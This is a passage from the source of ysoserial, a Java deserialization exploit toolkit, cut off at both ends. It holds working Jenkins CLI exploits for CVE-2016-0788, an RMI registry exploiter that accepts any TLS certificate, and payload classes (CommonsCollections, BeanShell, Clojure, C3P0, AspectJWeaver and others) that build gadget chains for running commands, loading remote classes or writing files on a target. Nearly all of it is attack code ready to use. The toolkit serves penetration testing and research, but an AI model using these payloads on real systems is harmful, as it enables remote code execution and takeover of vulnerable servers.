* (which is using jenkins' classloader) that typically is properly randomized.
* Fortunately - for the exploiting party - there is also a gadget that allows to leak
* that identifier via an exception.
*
* @author mbechler
*/
@SuppressWarnings ( {
"rawtypes", "restriction"
} )
public class JenkinsListener {
public static final void main ( final String[] args ) {
if ( args.length < 3 ) {
System.err.println(JenkinsListener.class.getName() + " <jenkins_url> <payload_type> <payload_arg>");
System.exit(-1);
}
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(args[ 1 ]);
if ( payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass) ) {
System.err.println("Invalid payload type '" + args[ 1 ] + "'");
System.exit(-1);
}
String jenkinsUrl = args[ 0 ];
int jrmpPort = 12345;
Channel c = null;
try {
InetSocketAddress isa = JenkinsCLI.getCliPort(jenkinsUrl);
c = JenkinsCLI.openChannel(isa);
Object call = c.call( JenkinsCLI.getPropertyCallable(JarLoader.class.getName() + ".ours"));
InvocationHandler remote = Proxy.getInvocationHandler(call);
int oid = Reflections.getField(Class.forName("hudson.remoting.RemoteInvocationHandler"), "oid").getInt(remote);
System.err.println("* JarLoader oid is " + oid);
Object uro = new JRMPListener().getObject(String.valueOf(jrmpPort));
Class<?> reqClass = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest");
Object o = makeIsPresentOnRemoteCallable(oid, uro, reqClass);
try {
c.call((Callable<?, ?>) o);
}
catch ( Exception e ) {
// [ActivationGroupImpl[UnicastServerRef [liveRef:
// [endpoint:[172.16.20.11:12345](local),objID:[de39d9c:15269e6d8bf:-7fc1,
// -9046794842107247609]]
System.err.println(e.getMessage());
parseObjIdAndExploit(args, payloadClass, jrmpPort, isa, e);
}
}
catch ( Throwable e ) {
e.printStackTrace();
}
finally {
if ( c != null ) {
try {
c.close();
}
catch ( IOException e ) {
e.printStackTrace(System.err);
}
}
}
}
private static Object makeIsPresentOnRemoteCallable ( int oid, Object uro, Class<?> reqClass )
throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, ClassNotFoundException {
Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
Reflections.setAccessible(reqCons);
return reqCons
.newInstance(oid, JarLoader.class.getMethod("isPresentOnRemote", Class.forName("hudson.remoting.Checksum")), new Object[] {
uro,
});
}
private static void parseObjIdAndExploit ( final String[] args, final Class<? extends ObjectPayload> payloadClass, int jrmpPort,
InetSocketAddress isa, Exception e ) throws Exception, IOException {
String msg = e.getMessage();
int start = msg.indexOf("objID:[");
if ( start < 0 ) {
throw new Exception("Failed to get object id");
}
int sep = msg.indexOf(", ", start + 1);
if ( sep < 0 ) {
throw new Exception("Failed to get object id, separator");
}
int end = msg.indexOf("]", sep + 1);
if ( end < 0 ) {
throw new Exception("Failed to get object id, separator");
}
String uid = msg.substring(start + 7, sep);
String objNum = msg.substring(sep + 2, end);
System.err.println("* UID is " + uid);
System.err.println("* ObjNum is " + objNum);
String[] parts = uid.split(":");
long obj = Long.parseLong(objNum);
int o1 = Integer.parseInt(parts[ 0 ], 16);
long o2 = Long.parseLong(parts[ 1 ], 16);
short o3 = Short.parseShort(parts[ 2 ], 16);
exploit(new InetSocketAddress(isa.getAddress(), jrmpPort), obj, o1, o2, o3, payloadClass, args[ 2 ]);
}
private static void exploit ( InetSocketAddress isa, long obj, int o1, long o2, short o3, Class<?> payloadClass, String payloadArg )
throws IOException {
Socket s = null;
DataOutputStream dos = null;
try {
System.err.println("* Opening JRMP socket " + isa);
s = SocketFactory.getDefault().createSocket(isa.getAddress(), isa.getPort());
s.setKeepAlive(true);
s.setTcpNoDelay(true);
OutputStream os = s.getOutputStream();
dos = new DataOutputStream(os);
dos.writeInt(TransportConstants.Magic);
dos.writeShort(TransportConstants.Version);
dos.writeByte(TransportConstants.SingleOpProtocol);
dos.write(TransportConstants.Call);
@SuppressWarnings ( "resource" )
final ObjectOutputStream objOut = new JRMPClient.MarshalOutputStream(dos);
objOut.writeLong(obj);
objOut.writeInt(o1);
objOut.writeLong(o2);
objOut.writeShort(o3);
objOut.writeInt(-1);
objOut.writeLong(Util.computeMethodHash(ActivationInstantiator.class.getMethod("newInstance", ActivationID.class, ActivationDesc.class)));
final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
final Object object = payload.getObject(payloadArg);
objOut.writeObject(object);
os.flush();
ObjectPayload.Utils.releasePayload(payload, object);
}
catch ( Exception e ) {
e.printStackTrace(System.err);
}
finally {
if ( dos != null ) {
dos.close();
}
if ( s != null ) {
s.close();
}
}
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JenkinsReverse.java
================================================
package ysoserial.exploit;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.rmi.registry.Registry;
import java.util.Random;
import hudson.remoting.Channel;
import ysoserial.exploit.JRMPListener;
import ysoserial.payloads.JRMPClient;
import ysoserial.payloads.ObjectPayload.Utils;
/**
* CVE-2016-0788 exploit (2)
*
* - Sets up a local {@link JRMPListener}
* - Delivers a {@link ysoserial.payloads.JRMPClient} payload via the CLI protocol
* that will cause the remote to open a JRMP connection to our listener
* - upon connection the specified payload will be delivered to the remote
* (that will deserialize using a default ObjectInputStream)
*
* @author mbechler
*
*/
public class JenkinsReverse {
public static final void main ( final String[] args ) {
if ( args.length < 4 ) {
System.err.println(JenkinsListener.class.getName() + " <jenkins_url> <local_addr> <payload_type> <payload_arg>");
System.exit(-1);
}
final Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
String myAddr = args[ 1 ];
int jrmpPort = new Random().nextInt(65536 - 1024) + 1024;
String jenkinsUrl = args[ 0 ];
Thread t = null;
Channel c = null;
try {
InetSocketAddress isa = JenkinsCLI.getCliPort(jenkinsUrl);
c = JenkinsCLI.openChannel(isa);
JRMPListener listener = new JRMPListener(jrmpPort, payloadObject);
t = new Thread(listener, "ReverseDGC");
t.setDaemon(true);
t.start();
Registry payload = new JRMPClient().getObject(myAddr + ":" + jrmpPort);
c.call(JenkinsCLI.getPropertyCallable(payload));
listener.waitFor(1000);
listener.close();
}
catch ( Throwable e ) {
e.printStackTrace();
}
finally {
if ( c != null ) {
try {
c.close();
}
catch ( IOException e ) {
e.printStackTrace(System.err);
}
}
if ( t != null ) {
t.interrupt();
try {
t.join();
}
catch ( InterruptedException e ) {
e.printStackTrace(System.err);
}
}
}
Utils.releasePayload(args[2], payloadObject);
}
}
================================================
FILE: src/main/java/ysoserial/exploit/RMIRegistryExploit.java
================================================
package ysoserial.exploit;
import java.io.IOException;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIClientSocketFactory;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;
import javax.net.ssl.*;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Gadgets;
import ysoserial.secmgr.ExecCheckingSecurityManager;
/*
* Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
* Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
*
* TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
* interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
*/
@SuppressWarnings({"rawtypes", "unchecked"})
public class RMIRegistryExploit {
private static class TrustAllSSL implements X509TrustManager {
private static final X509Certificate[] ANY_CA = {};
public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
}
private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
public Socket createSocket(String host, int port) throws IOException {
try {
SSLContext ctx = SSLContext.getInstance("TLS");
ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null);
SSLSocketFactory factory = ctx.getSocketFactory();
return factory.createSocket(host, port);
} catch(Exception e) {
throw new IOException(e);
}
}
}
public static void main(final String[] args) throws Exception {
final String host = args[0];
final int port = Integer.parseInt(args[1]);
final String command = args[3];
Registry registry = LocateRegistry.getRegistry(host, port);
final String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
// test RMI registry connection and upgrade to SSL connection on fail
try {
registry.list();
} catch(ConnectIOException ex) {
registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
}
// ensure payload doesn't detonate during construction or deserialization
exploit(registry, payloadClass, command);
}
public static void exploit(final Registry registry,
final Class<? extends ObjectPayload> payloadClass,
final String command) throws Exception {
new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
ObjectPayload payloadObj = payloadClass.newInstance();
Object payload = payloadObj.getObject(command);
String name = "pwned" + System.nanoTime();
Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
try {
registry.bind(name, remote);
} catch (Throwable e) {
e.printStackTrace();
}
Utils.releasePayload(payloadObj, payload);
return null;
}});
}
}
================================================
FILE: src/main/java/ysoserial/payloads/AspectJWeaver.java
================================================
package ysoserial.payloads;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.io.Serializable;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
/*
Gadget chain:
HashSet.readObject()
HashMap.put()
HashMap.hash()
TiedMapEntry.hashCode()
TiedMapEntry.getValue()
LazyMap.get()
SimpleCache$StorableCachingMap.put()
SimpleCache$StorableCachingMap.writeToPath()
FileOutputStream.write()
Usage:
args = "<filename>;<base64 content>"
Example:
java -jar ysoserial.jar AspectJWeaver "ahi.txt;YWhpaGloaQ=="
More information:
https://medium.com/nightst0rm/t%C3%B4i-%C4%91%C3%A3-chi%E1%BA%BFm-quy%E1%BB%81n-%C4%91i%E1%BB%81u-khi%E1%BB%83n-c%E1%BB%A7a-r%E1%BA%A5t-nhi%E1%BB%81u-trang-web-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-61efdf4a03f5
*/
@PayloadTest(skip="non RCE")
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"org.aspectj:aspectjweaver:1.9.2", "commons-collections:commons-collections:3.2.2"})
@Authors({ Authors.JANG })
public class AspectJWeaver implements ObjectPayload<Serializable> {
public Serializable getObject(final String command) throws Exception {
int sep = command.lastIndexOf(';');
if ( sep < 0 ) {
throw new IllegalArgumentException("Command format is: <filename>:<base64 Object>");
}
String[] parts = command.split(";");
String filename = parts[0];
byte[] content = Base64.decodeBase64(parts[1]);
Constructor ctor = Reflections.getFirstCtor("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
Object simpleCache = ctor.newInstance(".", 12);
Transformer ct = new ConstantTransformer(content);
Map lazyMap = LazyMap.decorate((Map)simpleCache, ct);
TiedMapEntry entry = new TiedMapEntry(lazyMap, filename);
HashSet map = new HashSet(1);
map.add("foo");
Field f = null;
try {
f = HashSet.class.getDeclaredField("map");
} catch (NoSuchFieldException e) {
f = HashSet.class.getDeclaredField("backingMap");
}
Reflections.setAccessible(f);
HashMap innimpl = (HashMap) f.get(map);
Field f2 = null;
try {
f2 = HashMap.class.getDeclaredField("table");
} catch (NoSuchFieldException e) {
f2 = HashMap.class.getDeclaredField("elementData");
}
Reflections.setAccessible(f2);
Object[] array = (Object[]) f2.get(innimpl);
Object node = array[0];
if(node == null){
node = array[1];
}
Field keyField = null;
try{
keyField = node.getClass().getDeclaredField("key");
}catch(Exception e){
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
}
Reflections.setAccessible(keyField);
keyField.set(node, entry);
return map;
}
public static void main(String[] args) throws Exception {
args = new String[]{"ahi.txt;YWhpaGloaQ=="};
PayloadRunner.run(AspectJWeaver.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/BeanShell1.java
================================================
package ysoserial.payloads;
import bsh.Interpreter;
import bsh.XThis;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;
import ysoserial.Strings;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.util.Reflections;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
/**
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
*/
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.beanshell:bsh:2.0b5" })
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
public PriorityQueue getObject(String command) throws Exception {
// BeanShell payload
String payload =
"compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
Strings.join( // does not support spaces in quotes
Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
",", "\"", "\"") +
"}).start();return new Integer(1);}";
// Create Interpreter
Interpreter i = new Interpreter();
// Evaluate payload
i.eval(payload);
// Create InvocationHandler
XThis xt = new XThis(i.getNameSpace(), i);
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
// Create Comparator Proxy
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] {1,1};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);
return priorityQueue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(BeanShell1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/C3P0.java
================================================
package ysoserial.payloads;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
*
*
* com.sun.jndi.rmi.registry.RegistryContext->lookup
* com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject
* com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject
*
* Arguments:
* - base_url:classname
*
* Yields:
* - Instantiation of remotely loaded class
*
* @author mbechler
*
*/
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0 implements ObjectPayload<Object> {
public Object getObject ( String command ) throws Exception {
int sep = command.lastIndexOf(':');
if ( sep < 0 ) {
throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
}
String url = command.substring(0, sep);
String className = command.substring(sep + 1);
PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
return b;
}
private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
private String className;
private String url;
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
return new Reference("exploit", this.className, this.url);
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
public PooledConnection getPooledConnection () throws SQLException {return null;}
public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(C3P0.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Click1.java
================================================
package ysoserial.payloads;
import org.apache.click.control.Column;
import org.apache.click.control.Table;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;
/*
Apache Click chain based on arbitrary getter calls in PropertyUtils.getObjectPropertyValue().
We use java.util.PriorityQueue to trigger ColumnComparator.compare().
After that, ColumnComparator.compare() leads to TemplatesImpl.getOutputProperties() via unsafe reflection.
Chain:
java.util.PriorityQueue.readObject()
java.util.PriorityQueue.heapify()
java.util.PriorityQueue.siftDown()
java.util.PriorityQueue.siftDownUsingComparator()
org.apache.click.control.Column$ColumnComparator.compare()
org.apache.click.control.Column.getProperty()
org.apache.click.control.Column.getProperty()
org.apache.click.util.PropertyUtils.getValue()
org.apache.click.util.PropertyUtils.getObjectPropertyValue()
java.lang.reflect.Method.invoke()
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getOutputProperties()
...
Arguments:
- command to execute
Yields:
- RCE via TemplatesImpl.getOutputProperties()
Requires:
- Apache Click
- servlet-api of any version
by @artsploit
*/
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"org.apache.click:click-nodeps:2.3.0", "javax.servlet:javax.servlet-api:3.1.0"})
@Authors({ Authors.ARTSPLOIT })
public class Click1 implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
// prepare a Column.comparator with mock values
final Column column = new Column("lowestSetBit");
column.setTable(new Table());
Comparator comparator = (Comparator) Reflections.newInstance("org.apache.click.control.Column$ColumnComparator", column);
// create queue with numbers and our comparator
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// stub data for replacement later
queue.add(new BigInteger("1"));
queue.add(new BigInteger("1"));
// switch method called by the comparator,
// so it will trigger getOutputProperties() when objects in the queue are compared
column.setName("outputProperties");
// finally, we inject and new TemplatesImpl object into the queue,
// so its getOutputProperties() method will be called
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
final Object templates = Gadgets.createTemplatesImpl(command);
queueArray[0] = templates;
return queue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(Click1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Clojure.java
================================================
package ysoserial.payloads;
import clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a;
import clojure.lang.PersistentArrayMap;
import ysoserial.Strings;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
/*
Gadget chain:
ObjectInputStream.readObject()
HashMap.readObject()
AbstractTableModel$ff19274a.hashCode()
clojure.core$comp$fn__4727.invoke()
clojure.core$constantly$fn__4614.invoke()
clojure.main$eval_opt.invoke()
Requires:
org.clojure:clojure
Versions since 1.2.0 are vulnerable, although some class names may need to be changed for other versions
*/
@Dependencies({"org.clojure:clojure:1.8.0"})
@Authors({ Authors.JACKOFMOSTTRADES })
public class Clojure extends PayloadRunner implements ObjectPayload<Map<?, ?>> {
public Map<?, ?> getObject(final String command) throws Exception {
// final String[] execArgs = command.split(" ");
// final StringBuilder commandArgs = new StringBuilder();
// for (String arg : execArgs) {
// commandArgs.append("\" \"");
// commandArgs.append(arg);
// }
// commandArgs.append("\"");
// final String clojurePayload =
// String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", commandArgs.substring(2));
String cmd = Strings.join(Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\").split(" ")), " ", "\"", "\"");
final String clojurePayload =
String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", cmd);
Map<String, Object> fnMap = new HashMap<String, Object>();
fnMap.put("hashCode", new clojure.core$constantly().invoke(0));
AbstractTableModel$ff19274a model = new AbstractTableModel$ff19274a();
model.__initClojureFnMappings(PersistentArrayMap.create(fnMap));
HashMap<Object, Object> targetMap = new HashMap<Object, Object>();
targetMap.put(model, null);
fnMap.put("hashCode",
new clojure.core$comp().invoke(
new clojure.main$eval_opt(),
new clojure.core$constantly().invoke(clojurePayload)));
model.__initClojureFnMappings(PersistentArrayMap.create(fnMap));
return targetMap;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(Clojure.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsBeanutils1.java
================================================
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.PriorityQueue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
@Authors({ Authors.FROHOFF })
public class CommonsBeanutils1 implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
// mock method name until armed
final BeanComparator comparator = new BeanComparator("lowestSetBit");
// create queue with numbers and basic comparator
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// stub data for replacement later
queue.add(new BigInteger("1"));
queue.add(new BigInteger("1"));
// switch method called by comparator
Reflections.setFieldValue(comparator, "property", "outputProperties");
// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = templates;
queueArray[1] = templates;
return queue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsBeanutils1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections1.java
================================================
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
Gadget chain:
ObjectInputStream.readObject()
AnnotationInvocationHandler.readObject()
Map(Proxy).entrySet()
AnnotationInvocationHandler.invoke()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
Method.invoke()
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
Requires:
commons-collections
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections1.class, args);
}
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAnnInvHUniversalMethodImpl();
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections2.java
================================================
package ysoserial.payloads;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
Gadget chain:
ObjectInputStream.readObject()
PriorityQueue.readObject()
...
TransformingComparator.compare()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
*/
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.apache.commons:commons-collections4:4.0" })
@Authors({ Authors.FROHOFF })
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {
public Queue<Object> getObject(final String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
// mock method name until armed
final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
// create queue with numbers and basic comparator
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
// stub data for replacement later
queue.add(1);
queue.add(1);
// switch method called by comparator
Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = templates;
queueArray[1] = 1;
return queue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections2.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections3.java
================================================
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;
import javax.xml.transform.Templates;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
/*
* Variation on CommonsCollections1 that uses InstantiateTransformer instead of
* InvokerTransformer.
*/
@SuppressWarnings({"rawtypes", "unchecked", "restriction"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
Object templatesImpl = Gadgets.createTemplatesImpl(command);
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[] { Templates.class },
new Object[] { templatesImpl } )};
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections3.class, args);
}
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAnnInvHUniversalMethodImpl();
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections4.java
================================================
package ysoserial.payloads;
import java.util.PriorityQueue;
import java.util.Queue;
import javax.xml.transform.Templates;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
/*
* Variation on CommonsCollections2 that uses InstantiateTransformer instead of
* InvokerTransformer.
*/
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections4 implements ObjectPayload<Queue<Object>> {
public Queue<Object> getObject(final String command) throws Exception {
Object templates = Gadgets.createTemplatesImpl(command);
ConstantTransformer constant = new ConstantTransformer(String.class);
// mock method name until armed
